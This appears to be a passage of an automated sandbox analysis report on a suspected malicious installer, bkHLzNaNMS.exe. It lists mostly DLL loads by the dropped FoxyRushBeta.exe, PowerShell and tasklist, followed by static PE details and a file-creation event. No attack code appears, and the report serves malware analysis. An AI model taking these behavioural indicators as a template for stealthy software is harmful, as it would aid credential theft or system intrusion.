Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dxcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe  Section loaded: npmproxy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3d12core.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: dxilconv.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: d3dscache.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: directml.dll
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: bkHLzNaNMS.exe Static file information: File size 82341697 > 1048576
Source: bkHLzNaNMS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: Binary string: libGLESv2.dll.pdb source: libGLESv2.dll.0.dr
Source: ffmpeg.dll.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr Static PE information: section name: _RDATA
Source: FoxyRushBeta.exe.0.dr Static PE information: section name: .gxfg
Source: FoxyRushBeta.exe.0.dr Static PE information: section name: .retplne
Source: FoxyRushBeta.exe.0.dr Static PE information: section name: .rodata
Source: FoxyRushBeta.exe.0.dr Static PE information: section name: CPADinfo
Source: FoxyRushBeta.exe.0.dr Static PE information: section name: LZMADEC
Source: FoxyRushBeta.exe.0.dr Static PE information: section name: _RDATA
Source: FoxyRushBeta.exe.0.dr Static PE information: section name: malloc_h
Source: FoxyRushBeta.exe.0.dr Static PE information: section name: prot
Source: libEGL.dll.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr Static PE information: section name: .retplne
Source: libEGL.dll.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr Static PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr Static PE information: section name: _RDATA
Source: FoxyRushBeta.exe0.0.dr Static PE information: section name: .gxfg
Source: FoxyRushBeta.exe0.0.dr Static PE information: section name: .retplne
Source: FoxyRushBeta.exe0.0.dr Static PE information: section name: .rodata
Source: FoxyRushBeta.exe0.0.dr Static PE information: section name: CPADinfo
Source: FoxyRushBeta.exe0.0.dr Static PE information: section name: LZMADEC
Source: FoxyRushBeta.exe0.0.dr Static PE information: section name: _RDATA
Source: FoxyRushBeta.exe0.0.dr Static PE information: section name: malloc_h
Source: FoxyRushBeta.exe0.0.dr Static PE information: section name: prot
Source: node.napi.node.0.dr Static PE information: section name: _RDATA
Source: node_sqlite3.node.0.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\ffmpeg.dll
